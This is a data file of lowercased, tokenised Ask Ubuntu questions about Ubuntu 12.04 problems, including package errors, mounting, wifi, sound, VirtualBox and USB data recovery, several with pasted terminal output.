191226	dnsmasq : failed to create listening socket for port 53 : address already in use	i was setting up a server as in the below link https : //help.ubuntu.com/community/dnsmasq root @ user-desktop : /etc/init.d # sudo apt-get install dnsmasq reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : dnsmasq 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/15.4 kb of archives . after this operation , 120 kb of additional disk space will be used . selecting previously unselected package dnsmasq . ( reading database ... 146283 files and directories currently installed . ) unpacking dnsmasq ( from ... /dnsmasq_2.59-4_all.deb ) ... processing triggers for ureadahead ... setting up dnsmasq ( 2.59-4 ) ... * starting dns forwarder and dhcp server dnsmasq dnsmasq : failed to create listening socket for port 53 : address already in use [ fail ] invoke-rc.d : initscript dnsmasq , action `` start '' failed .
191227	what is the default window manager in 12.04 ?	i do n't know how to find the default window manager application name ( executable file name and path ) . i need help to find the window manager .
191234	downloading takes hours:	i have downloaded `` ubuntu-12.04.1-desktop-i386.iso '' and extracted it using magic iso . there is a file wubi.exe is the extracted folder . to install ubuntu i double clicked it ( i am using windows 7 ) ; it asks the isntallaton folder and asks to create username and password . then straight away it says it is downloading `` ubuntu-12.04.1-wubi-i386.tar.xz '' . it it shows nearly seven hours of downloading time remaining ( i have a slow internet connection ) . ca n't i install ubuntu offline ? thank you in advance .
191235	i can not install or remove packages	i tried to install the openoffice.org package but it gave an error . now i can not repair , remove or install nothing . the software center of xubuntu gives this error log . nothing seems to solve this . i tried apt-get install -f but it does not solve the problem either . any suggestions ? installarchives ( ) failed : ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 184189 files and directories currently installed . ) unpacking libreoffice-common ( from ... /libreoffice-common_1 % 3a3.5.4-0ubuntu1.1_all.deb ) ... dpkg : error processing /var/cache/apt/archives/libreoffice-common_1 % 3a3.5.4-0ubuntu1.1_all.deb ( -- unpack ) : trying to overwrite '/usr/bin/soffice ' , which is also in package openoffice.org-debian-menus 3.2-9502 no apport report written because maxreports is reached already rmdir : erro ao remover /var/lib/libreoffice/share/prereg/ : ficheiro ou directoria inexistente rmdir : erro ao remover /var/lib/libreoffice/share/ : directoria no vazia rmdir : erro ao remover /var/lib/libreoffice/program/ : ficheiro ou directoria inexistente rmdir : erro ao remover /var/lib/libreoffice : directoria no vazia rmdir : erro ao remover /var/lib/libreoffice : directoria no vazia processing triggers for desktop-file-utils ... processing triggers for shared-mime-info ... processing triggers for gnome-icon-theme ... processing triggers for hicolor-icon-theme ... processing triggers for man-db ... errors were encountered while processing : /var/cache/apt/archives/libreoffice-common_1 % 3a3.5.4-0ubuntu1.1_all.deb dpkg : dependency problems prevent configuration of libreoffice-java-common : libreoffice-java-common depends on libreoffice-common ; however : package libreoffice-common is not installed . dpkg : error processing libreoffice-java-common ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libreoffice-filter-mobiledev : libreoffice-filter-mobiledev depends on libreoffice-java-common ; however : package libreoffice-java-common is not configured yet . dpkg : error processing libreoffice-filter-mobiledev ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libreoffice-base : libreoffice-base depends on libreoffice-java-common ( > = 1:3.5.4~ ) ; however : package libreoffice-java-common is not configured yet . dpkg : error processing libreoffice-base ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libreoffice-core : libreoffice-core depends on libreoffice-common ( > > 1:3.5.4 ) ; however : package libreoffice-common is not installed . dpkg : error processing libreoffice-core ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libreoffice-style-human : libreoffice-style-human depends on libreoffice-core ; however : package libreoffice-core is not configured yet . dpkg : error processing libreoffice-style-human ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libreoffice-math : libreoffice-math depends on libreoffice-core ( = 1:3.5.4-0ubuntu1.1 ) ; however : package libreoffice-core is not configured yet . dpkg : error processing libreoffice-math ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libreoffice-impress : libreoffice-impress depends on libreoffice-core ( = 1:3.5.4-0ubuntu1.1 ) ; however : package libreoffice-core is not configured yet . dpkg : error processing libreoffice-impress ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libreoffice-style-tango : libreoffice-style-tango depends on libreoffice-core ; however : package libreoffice-core is not configured yet . dpkg : error processing libreoffice-style-tango ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libreoffice : libreoffice depends on libreoffice-core ( = 1:3.5.4-0ubuntu1.1 ) ; however : package libreoffice-core is not configured yet . libreoffice depends on libreoffice-impress ; however : package libreoffice-impress is not configured yet . libreoffice depends on libreoffice-math ; however : package libreoffice-math is not configured yet . libreoffice depends on libreoffice-base ; however : package libreoffice-base is not configured yet . libreoffice depends on libreoffice-filter-mobiledev ; however : package libreoffice-filter-mobiledev is not configured yet . libreoffice depends on libreoffice-java-common ( > = 1:3.5.4~ ) ; however : package libreoffice-java-common is not configured yet . dpkg : error processing libreoffice ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libreoffice-writer : libreoffice-writer depends on libreoffice-core ( = 1:3.5.4-0ubuntu1.1 ) ; however : package libreoffice-core is not configured yet . dpkg : error processing libreoffice-writer ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of mythes-en-us : mythes-en-us depends on libreoffice-core | openoffice.org-core ( > = 1.9 ) | language-support-writing-en ; however : package libreoffice-core is not configured yet . package openoffice.org-core is not installed . package language-support-writing-en is not installed . dpkg : error processing mythes-en-us ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libreoffice-help-zh-cn : libreoffice-help-zh-cn depends on libreoffice-writer | language-support-translations-zh ; however : package libreoffice-writer is not configured yet . package language-support-translations-zh is not installed . dpkg : error processing libreoffice-help-zh-cn ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libreoffice-base-core : libreoffice-base-core depends on libreoffice-core ( = 1:3.5.4-0ubuntu1.1 ) ; however : package libreoffice-core is not configured yet . dpkg : error processing libreoffice-base-core ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libreoffice-gnome : libreoffice-gnome depends on libreoffice-core ( = 1:3.5.4-0ubuntu1.1 ) ; however : package libreoffice-core is not configured yet . dpkg : error processing libreoffice-gnome ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libreoffice-help-pt-br : libreoffice-help-pt-br depends on libreoffice-writer | language-support-translations-pt ; however : package libreoffice-writer is not configured yet . package language-support-translations-pt is not installed . dpkg : error processing libreoffice-help-pt-br ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libreoffice-emailmerge : libreoffice-emailmerge depends on libreoffice-core ; however : package libreoffice-core is not configured yet . dpkg : error processing libreoffice-emailmerge ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libreoffice-help-en-gb : libreoffice-help-en-gb depends on libreoffice-writer | language-support-translations-en ; however : package libreoffice-writer is not configured yet . package language-support-translations-en is not installed . dpkg : error processing libreoffice-help-en-gb ( -- configure ) : dependency problems - leaving unconfigured
191240	ca n't write to disk	i have seen questions similar to this , but the answers are either beyond me or the situation does n't quite match mine . would appreciate some direction . i recently installed ubuntu 12.04 lts . the os is on a disk formatted as ext4 . i added another disk to the system and formatted it as w95 fat 32 ( lba ) ( 0x0c ) . i did this because i am moving from windows to linux , will be needing to go back and forth with data for a while , and might need to move the disk to a windows machine . there may have been a better format to use , but if so i did n't know any better . i was able to transfer data from an external drive to this fat32 drive with no problem . now , though , when i try to create a new folder or write a file to the disk i get a message that the disk is read-only . if i go to the properties , permissions for the disk , for folder access it says 'create and delete files ' . if i try to change file access underneath to 'read and write ' , either nothing happens or i get a message it ca n't be done . thank you for any help .
191250	virtualbox windows 7 guest - pressing windows key launches unity menu	running win7 as guest in full screen mode . when i press windows key or alt+tab the vm looses focus and displays the unity menu or ubuntu 's alt+tab . i 've set the vbox configuration : file menu - > input - > auto capture keyboard but it looks like some times it captures it and some times it doesn't do you know how to run win7 in fullscreen and have all windows key or alt+tab strokes captured by the win7vm only ?
191253	error when trying to boot from usb	i used unetbootin to create a live-usb of ubuntu 12.04 , but when i try to boot it only gets to a black screen with 'syslinux 4.03 2010-1 -- 22 edd copyright ( c ) 1994-2-1- ... ' written on it . i use acer a0722 netbook with amd-64 bit processor and 4gb ram . note that i also tried other isos such as android-x86 and they did n't work too . please what could be the problem , i have checked on some other forums but could n't find a tangible solution , and i have also tried using usb disk creator software too .
191257	how could i shutdown a remote host , in my network thru ssh , with a local host ?	the question is simple . what would be the script i would have to use to shut down a computer in my network thru ssh . normaly i would go to command line and : ssh desktop delik @ desktop 's password : delik @ desktop : ~ $ sudo shutdown -p 0 to power on i created a file and wrote : wakeonlan xx : xx : xx : xx : xx : xx and gave it the executable bit that way to power on it requires only a double click . would i be capable of doing the same to shutdown ?
191258	samsung rv520 with 12.04 freezes while having wifi and brightness control issues	i have a new samsung rv520 and have just installed precise pangolin 12.04 lts . i am having serious problems now with the wifi constantly disconnecting . this then causes the brightness control to appear on the screen . the screen starts flickering and then freezes the whole machine . indeed the brightness control does n't work at all . i am using a intel centrino n wireless card . please can anyone provide any guidance as to how to resolve these issue on this machine . many thanks for your help . output from lspci and dmesg : lspci 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation 6 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 6 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 6 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 6 series chipset family pci express root port 1 ( rev b4 ) 00:1c.3 pci bridge : intel corporation 6 series chipset family pci express root port 4 ( rev b4 ) 00:1d.0 usb controller : intel corporation 6 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm65 express chipset family lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 6 series chipset family 6 port sata ahci controller ( rev 04 ) 00:1f.3 smbus : intel corporation 6 series chipset family smbus controller ( rev 04 ) 01:00.0 network controller : intel corporation centrino wireless-n 130 ( rev 34 ) 02:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 06 ) dmesg | grep -i firmware [ 0.917077 ] [ firmware bug ] : acpi : bios _osi ( linux ) query ignored [ 1.118837 ] [ firmware bug ] : acpi : no _bqc method , can not determine initial brightness [ 11.852357 ] iwlagn 0000:01:00.0 : loaded firmware version 17.168.5.2 build 35905
191260	i lost the `` global menu bar integration '' firefox addon	i somehow lost the `` global menu bar integration '' firefox addon . probably uninstalled it accidentally . i have tried dpkg-reconfigure and also apt-get remove firefox-globalmenu & & apt-get install firefox-globalmenu . but neither worked . how do i get the add-on into firefox addon ? i could n't find an xpi file either , to point firefox manually to it for installation . edit : found a fix on my own , see my comment to the answer that was mots helpful : ) thanks everyone for looking into this .
191266	explain this terminal command please	can someone please explain the following terminal command in ubuntu : - mount -o rw , remount
191269	storing deb packages on local media	is there a way to store deb packages ( all or a specific version of package ) on a local media ( dvd , usb etc ... ) so later i would be able to install those packages on a pc which does not have internet connection ? for example , these are the packages that i want to install on a pc which does n't have internet connection : # tinyos msp430 gcc compiler repository # version 4.6.3 deb http : //tinyprod.net/repos/debian squeeze main deb http : //tinyprod.net/repos/debian msp430-46 main # tinyos version 2.1.2 deb http : //tinyos.stanford.edu/tinyos/dists/ubuntu lucid main
191270	copy a file to remote server ( very complicated )	i want to copy a file from my ubuntu desktop ( user : vverma ) to a server named fb3 , please guide me regarding how to scp this ? in order to reach fb3 , i have to follow these steps : - ssh to server1 as user1 from my terminal ssh from server1 to server2 as user1 sudo su - user2 ssh from server2 to server3 ( which is fb3 ) as user2 now please guide me that how can i accomplish this complicated tsak without creating any errors .
191278	could n't add or remove programs using ubuntu software center ( usc ) in kubuntu 12.04	i am using kubuntu 12.04 , currently.recently , i updated my system with update manager and downloaded usc from muon software center which was pre-installed in this system . i could download a lot of softwares such as : -firefox -xbmc media center -vlc media player but when i tried to get some more softwares using usc , after rebooting there began the problem . it does not begin either downloading or instaling the program . when i tried to download the same program using muon software center it showed the following : unable to obtain the package at this time another application seems to be using the package system at this time . you must close all other package managers before you will be able to install or remove any packages . i am quite sure that have closed usc . i tried to remove usc , assuming that it caused the problem using muon software center but the result was same.now i can not add or remove any programs into my system & i do n't know what to do . please help me as soon as possible .
191281	pasting from vim in terminal to google docs ( firefox + vimperator ) - need to understand	i had some trouble with copy-pasting text from vim in terminal to google docs ( aka drive ) document ( hereafter gdd ) in ff browser ( with vimperator ) . note : i have a file opened in vim 7.2 in terminal : version displays both +clipboard and +xterm-clipboard i 'm on ubuntu 10.04 lts , so i do n't think that 's unity-related i want to use vim , not gvim , nor gedit ... i 'm avid fan of mouseless navigation , so solution with mouse was not what i wanted . i have the solution , but i need understanding . what i tried and where it gets me : yanking whole file text via : ggvgy allows me to : paste it via mouse middle button , not with ctrl+v or shift+insert here , in text area for entering question text in gedit but not in gdd where i want it pasted , even if i switch vimperator to pass-through mode with insert does not show in xclip after xclip -o from gedit , i can copy-paste the text into gdd ( vimperator 's pass-through mode not required ) . : % ! ! xclip -i ( or : first , last ) reports whole file ( all lines , to be precise ) as filtered , though shell returns 1 `xclip -o ' returns nothing ( is empty ) or returns previously copied value with 2. no surprise , but i ca n't paste at all not only to gdd but also to gedit or here setting clipboard ( : set clipboard=unnamed ) to unnamed does n't help using `` +y or `` *y on whole file text actually does the trick so , the question ( it 's actually three , say `` split '' and i will ) : why middle mouse button pastes different things than ctrl+v and how to know what will be pasted with each ? why just yanking ( without registers ) works with mouse but not with keyboard / xclip ? why did n't unnamed register help ? after setting , it should make unnamed and * registers same ?
191290	freshclam error	after installing clamav and clamtk , when doing freshclam i receive this message : freshclam error : ca n't create temporary directory /var/lib/clamav/clamav-f52645d8e80b9b727228734e339d231d hint : the database directory must be writable for uid 1000 or gid 1000 could somebody help ?
191294	missed snapshot tab in virtualbox	i have ubuntu 12.04 and virtualbox 4.1.12 . all manuals and help documents refer to snapshot tab in top right corner of virtualbox manager . but i have no idea where can i find it . screenshot is attached . does anybody know anyting about how can i get acces to snapshot manager tab ? ( take a snapshot i can when machine is running ) .
191304	how do i install ductilcad with draftsight ?	is it possible to install ductilcad with draftsight ? is there any other program with pipe acess贸ries ( like ductilcad ) that is compatible with darftsight ?
191306	every attempts of installation returns error code ( 1 )	mihirm3m @ mihirm3m-hp-pavilion-dv5-notebook-pc : ~ $ sudo apt-get install steadyflow [ sudo ] password for mihirm3m : reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : libunique-1.0-0 the following new packages will be installed : libunique-1.0-0 steadyflow 0 upgraded , 2 newly installed , 0 to remove and 0 not upgraded . 2 not fully installed or removed . need to get 184 kb of archives . after this operation , 1,373 kb of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 http : //in.archive.ubuntu.com/ubuntu/ precise/main libunique-1.0-0 i386 1.1.6-4 [ 25.2 kb ] get:2 http : //in.archive.ubuntu.com/ubuntu/ precise/universe steadyflow i386 0.1.7-2ubuntu1 [ 159 kb ] fetched 184 kb in 13s ( 13.9 kb/s ) selecting previously unselected package libunique-1.0-0 . ( reading database ... 214840 files and directories currently installed . ) unpacking libunique-1.0-0 ( from ... /libunique-1.0-0_1.1.6-4_i386.deb ) ... selecting previously unselected package steadyflow . unpacking steadyflow ( from ... /steadyflow_0.1.7-2ubuntu1_i386.deb ) ... processing triggers for hicolor-icon-theme ... processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... processing triggers for libglib2.0-0 ... processing triggers for man-db ... setting up capiutils ( 1:3.12.20071127-0ubuntu11 ) ... note : running makedev to create capi devices in /dev ... mount : unknown filesystem type 'capifs' invoke-rc.d : initscript capiutils , action `` start '' failed . dpkg : error processing capiutils ( -- configure ) : subprocess installed post-installation script returned error exit status 32 no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of drdsl : drdsl depends on capiutils ; however : package capiutils is not configured yet . dpkg : error processing drdsl ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already setting up libunique-1.0-0 ( 1.1.6-4 ) ... setting up steadyflow ( 0.1.7-2ubuntu1 ) ... processing triggers for libc-bin ... ldconfig deferred processing now taking place errors were encountered while processing : capiutils drdsl e : sub-process /usr/bin/dpkg returned an error code ( 1 ) mihirm3m @ mihirm3m-hp-pavilion-dv5-notebook-pc : ~ $
191317	rescue data from usb disk - do n't want to format	i have a problem with my usb flash disk . it 's a kingston datatraveler . i use it intensely , and since yesterday it has become corrupted . i ca n't remember that i took it out before dismounting ( or safely removing , since i mostly use it on a win7 - vm ubuntu machine ) , but that seems to be the most likely cause . i searched and searched , but it seems everyone gives up eventually on trying to rescue data in this situation . however , i 'm stubborn and i need your help . these are the diagnostics that i did so far : walle @ earth : ~ $ sudo fdisk -l /dev/sdb walle @ earth : ~ $ sudo fdisk -l disk /dev/sda : 21.5 gb , 21474836480 bytes 255 heads , 63 sectors/track , 2610 cylinders , total 41943040 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0009a95f device boot start end blocks id system /dev/sda1 * 2046 41943039 20970497 5 extended /dev/sda5 2048 6000639 2999296 82 linux swap / solaris /dev/sda6 6002688 41943039 17970176 83 linux walle @ earth : ~ $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 002 : id 80ee:0021 virtualbox usb tablet bus 001 device 006 : id 0c76:0005 jmtek , llc . transcend flash disk walle @ earth : ~ $ ls -lar /dev/disk /dev/disk : total 0 drwxr-xr-x 5 root root 100 sep 21 12:22 . drwxr-xr-x 16 root root 4180 sep 21 12:22 .. drwxr-xr-x 2 root root 240 sep 21 12:22 by-id drwxr-xr-x 2 root root 160 sep 21 12:22 by-path drwxr-xr-x 2 root root 80 sep 21 12:22 by-uuid /dev/disk/by-id : total 0 drwxr-xr-x 2 root root 240 sep 21 12:22 . drwxr-xr-x 5 root root 100 sep 21 12:22 .. lrwxrwxrwx 1 root root 9 sep 21 11:08 ata-vbox_cd-rom_vb0-01f003f6 - > ../../sr0 lrwxrwxrwx 1 root root 9 sep 21 11:29 ata-vbox_harddisk_vb0f06d815-0d4e855f - > ../../sda lrwxrwxrwx 1 root root 10 sep 21 11:28 ata-vbox_harddisk_vb0f06d815-0d4e855f-part1 - > ../../sda1 lrwxrwxrwx 1 root root 10 sep 21 11:08 ata-vbox_harddisk_vb0f06d815-0d4e855f-part5 - > ../../sda5 lrwxrwxrwx 1 root root 10 sep 21 11:08 ata-vbox_harddisk_vb0f06d815-0d4e855f-part6 - > ../../sda6 lrwxrwxrwx 1 root root 9 sep 21 11:29 scsi-sata_vbox_harddisk_vb0f06d815-0d4e855f - > ../../sda lrwxrwxrwx 1 root root 10 sep 21 11:28 scsi-sata_vbox_harddisk_vb0f06d815-0d4e855f-part1 - > ../../sda1 lrwxrwxrwx 1 root root 10 sep 21 11:08 scsi-sata_vbox_harddisk_vb0f06d815-0d4e855f-part5 - > ../../sda5 lrwxrwxrwx 1 root root 10 sep 21 11:08 scsi-sata_vbox_harddisk_vb0f06d815-0d4e855f-part6 - > ../../sda6 lrwxrwxrwx 1 root root 9 sep 21 12:07 usb-generic_usb_mass_storage-0:0 - > ../../sdb /dev/disk/by-path : total 0 drwxr-xr-x 2 root root 160 sep 21 12:22 . drwxr-xr-x 5 root root 100 sep 21 12:22 .. lrwxrwxrwx 1 root root 9 sep 21 11:08 pci-0000:00:01.1-scsi-0:0:0:0 - > ../../sr0 lrwxrwxrwx 1 root root 9 sep 21 12:07 pci-0000:00:0b.0-usb-0:1:1.0-scsi-0:0:0:0 - > ../../sdb lrwxrwxrwx 1 root root 9 sep 21 11:29 pci-0000:00:0d.0-scsi-1:0:0:0 - > ../../sda lrwxrwxrwx 1 root root 10 sep 21 11:28 pci-0000:00:0d.0-scsi-1:0:0:0-part1 - > ../../sda1 lrwxrwxrwx 1 root root 10 sep 21 11:08 pci-0000:00:0d.0-scsi-1:0:0:0-part5 - > ../../sda5 lrwxrwxrwx 1 root root 10 sep 21 11:08 pci-0000:00:0d.0-scsi-1:0:0:0-part6 - > ../../sda6 /dev/disk/by-uuid : total 0 drwxr-xr-x 2 root root 80 sep 21 12:22 . drwxr-xr-x 5 root root 100 sep 21 12:22 .. lrwxrwxrwx 1 root root 10 sep 21 11:08 1587b411-663d-4b75-93e0-06ed4f76f55c - > ../../sda5 lrwxrwxrwx 1 root root 10 sep 21 11:08 28c80af8-f546-46ec-9b63-38cbd7c0b9f2 - > ../../sda6 gparted does n't detect the device , gnome-disk-utility does , but under `` capacity '' it says `` no media detected '' . testdisk does n't detect it either . additionally , the symptoms on win 7 are that the drive is visible , but not accessible in explorer ( `` please insert a disk into removable disk f : '' when trying to browse it , and `` can not open volume for direct access . '' when trying to run chkdsk ) . my hopes sprang up when i plugged it into a vista computer : it detects it and can dismount it . i still can not access anything on there , but when i search for some files by name they show up in results , although i still ca n't open them . please help if you have any idea on how i can recover my data . any help would be much appreciated .
191323	move along by word keyboard combination	i 'd like to change the default behaviour when editing text . by default , to move one word along , one would press ctrl+→ . this is useful for selecting portions of text quickly when in normal* text environments . where can i modify this to use a different modifier key ( e.g . alt ) ? i ca n't find it in the keyboard layout > options or in the keyboard > shorcuts . *i.e . not vim/other editor
191333	can not use apt-get with the parameter -- configure	$ sudo apt-get purge capiutils drdsl reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : capiutils* drdsl* 0 upgraded , 0 newly installed , 2 to remove and 0 not upgraded . 2 not fully installed or removed . after this operation , 372 kb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 215204 files and directories currently installed . ) removing drdsl ... purging configuration files for drdsl ... removing capiutils ... purging configuration files for capiutils ... processing triggers for man-db ... processing triggers for ureadahead ... ureadahead will be reprofiled on next reboot $ sudo apt-get autoremove reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . $ sudo apt-get -- configure -- pending e : command line option -- configure is not understood
191343	how to make ubuntu detect my system jack as speakers so i can have 5.1 sound ?	i have an acer 5738g with ubuntu 12.04 , i modified the configurations to have 5.1 sound . it works , but my problem is that only my laptop speakers are detected as speakers in sound settings , when i plug in my system audio jack , ubuntu detects headphones and ones that only have 2.0 sound . so how can i make ubuntu detect my system jack as speakers ?
191344	microphone not working ubuntu 12.04 i hear myself	i have ubuntu 12.04 . alsamixer reports my soundcard ( on board ) as card hda ati sb and chip realtek alc892 . i have also installed realtek linux audiopack 5.17 and pavucontrol . i also removed and reinstalled alsa drivers . at pavucontrol i selected as input configuration analog stereo duplex ( tried also all the other alternatives ) . i use headphones connected at the front panel . now when i unmute from alsamixer the front mic i can hear myself at the headphones . nothing from what i have found works . ubuntu 10.10 did not have a problem . i have a skype interview on tuesday so if anyone can help i am very thankful .
191352	rhythmbox cuts radio playback then raises python error	scenario : stock ubuntu 12.04 32bit in two machines ; one is a laptop , one is a virtualbox vm under winxp , default ubuntu install , both with cairo-dock ( the problem appeared also under default unity , though ) . machines are one at home ( cable-modem internet ) and the other at the office ( several internet connections , load-balanced ) . problem : rhythmbox refuses to stay connected to a radio . anyone of the included radio lists , but i mostly `` tune it '' to absolute classic rock . it starts playing for a couple of minutes , then cuts the audio , like it 's buffering for a while , then resumes but at lower quality . then , it cuts audio again and looks for a decoder . after a while searching an error box pops-up with the following text , no title : required plugin could not be found python ( v2.7 ) requires to install plugins to play media files of the following type : text/html decoder the laptop had a clean reinstall ; it had 10.04lts ( upgrade 10.04- > 12.04 gone awry ) and its old rhythmbox worked correctly . no cutouts at all , except under heavy network loads , but that was expected ; and then it even tried two or three times at hi-quality ( broadband ) before going lo-quality ( modem ) . did not have the vm at the moment . in 12.04 it tries once , then steps quality down , then the plugin search , then the error appears . meanwhile , at the office , ancient winamp 2.95 works flawlessly in the winxp host when tuned to the same radio ... at the same time ! is there a solution to this problem ? am i missing some very stupid config or setting ? how can i debug where the problem is ?
191354	why i am getting ca n't open /etc/rc.d/init.d/functions error ?	i got bash script from internet for for running the clamav antivirus in demon mode . but am getting the below error . ca n't open /etc/rc.d/init.d/functions i checked /etc/rc.d/init.d/ directory there is no file named functions . mine is ubuntu 12.04 my script is # source function library . . /etc/rc.d/init.d/functions # source networking configuration . . /etc/sysconfig/network [ -x /usr/local/sbin/clamd ] || exit 0 ... .. any idea ?
191356	ubuntu wireless	i have just downloaded linux ubuntu and i ca n't seem to find my wifi . when i tried to connect manually i still could n't do it . is there anyway around this ? i have virgin media broadband by the way . to add to this i have installed linux . however i can see all other wifis but not the ones i want
191357	ubuntu 12.04 automounting ntfs partition	ive looked everywhere to fix this problem but i cant seem to figure out why its doing this . i have the following /etc/fstab entry to mount a ntfs partition using ntfs-3g . uuid=01cd842715ec2180 /media/mediahd02 ntfs defaults , user , noexec , uid=1000 , gid=1000 , dmask=007 , fmask=117 0 2 the volume label for this partition is `` media02 '' so i have had no problems with the fstab mounting . the problem however is that it automounts again using media02 label . i 'm not sure automounting is the right term for this as its just an empty directory . deleting this directory and rebooting is causing it to appear again . so listing /media i see both media02 & mediahd02 htpc @ htpc : ~ $ cat /etc/fstab # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sdf1 during installation uuid=ec027544-b0e7-4145-99a4-905543a9781a / ext4 errors=remount-ro , noatime , discard 0 1 # swap was on /dev/sdf5 during installation uuid=1794409e-723f-41ac-9f31-ae059f377613 none swap sw 0 0 # added all the lines below this tmpfs /tmp tmpfs defaults , noatime , mode=1777 0 0 uuid=0f70-3b06 /media/mediahd01 vfat defaults , user , noexec , uid=1000 , gid=1000 , dmask=007 , fmask=117 0 2 uuid=01cd842715ec2180 /media/mediahd02 ntfs defaults , user , noexec , uid=1000 , gid=1000 , dmask=007 , fmask=117 0 2 htpc @ htpc : ~ $ cat /etc/mtab /dev/sdc1 / ext4 rw , noatime , errors=remount-ro , discard 0 0 proc /proc proc rw , noexec , nosuid , nodev 0 0 sysfs /sys sysfs rw , noexec , nosuid , nodev 0 0 none /sys/fs/fuse/connections fusectl rw 0 0 none /sys/kernel/debug debugfs rw 0 0 none /sys/kernel/security securityfs rw 0 0 udev /dev devtmpfs rw , mode=0755 0 0 devpts /dev/pts devpts rw , noexec , nosuid , gid=5 , mode=0620 0 0 tmpfs /tmp tmpfs rw , noatime , mode=1777 0 0 tmpfs /run tmpfs rw , noexec , nosuid , size=10 % , mode=0755 0 0 none /run/lock tmpfs rw , noexec , nosuid , nodev , size=5242880 0 0 none /run/shm tmpfs rw , nosuid , nodev 0 0 /dev/sdc1 /media/usbhd-sdc1 ext4 rw , relatime 0 0 /dev/sdb1 /media/mediahd02 fuseblk rw , noexec , nosuid , nodev , allow_other , default_permissions , blksize=4096 0 0 /dev/sda5 /media/mediahd01 vfat rw , noexec , nosuid , nodev , uid=1000 , gid=1000 , dmask=007 , fmask=117 0 0 /dev/sdh1 /media/windows_7 fuseblk rw , nosuid , nodev , allow_other , blksize=4096 0 0 can someone shed some light as to why its doing this ?
191358	how do i change my desktop theme from grey bars to black bars ?	i am using ubuntu 12.04.1 and i have just installed the official nvidia driver . now every time i log in , any gnome based desktop replacement ( like unity or cinnamon ) does n't start correctly . it displays the ugly gray bars . cinnamon looks like this : unity looks like this : is there a way to reset the gnome settings or what else can i do ? i have tried to uninstall and reinstall cinnamon , but the problem is still present .
191359	after installation whole disk encryption ? 12.04	i know some fragments of this question have been asked in previous posts and i have reviewed them - however i have a more thorough question ... i did not choose to do whole disk encryption when i used the alternative installer to install my 12.04 distro . i thought that truecypt worked with linux on system drive ( whole disk ) encryption - but sadly found out it did not . i have totally tweaked and pimped out my installation and i do not want to have to go back and `` install '' to just get whole disk encryption . any alternatives that anyone knows of ? i do n't want just /home ... i want the whole system installation protected and made secure so that when i boot i get a password to unencrypt .
191362	hardinfo does n't display anything in the `` sensors '' section	is there a way to make hardinfo to display results on `` sensors '' section ? currently as much long i wait it does n't display anything.i have installed lm-sensors if that matters , but still nothing .
191363	can i use / view ubuntu software online ?	i like to use / view ubuntu software online . i meet a lot of people who do n't know ubuntu , and sometimes i want to show them more than screen shots / recording . is there any way i can show them ubuntu software like nautilus / shotwell / firefox / libreoffice/ unity interface online ?
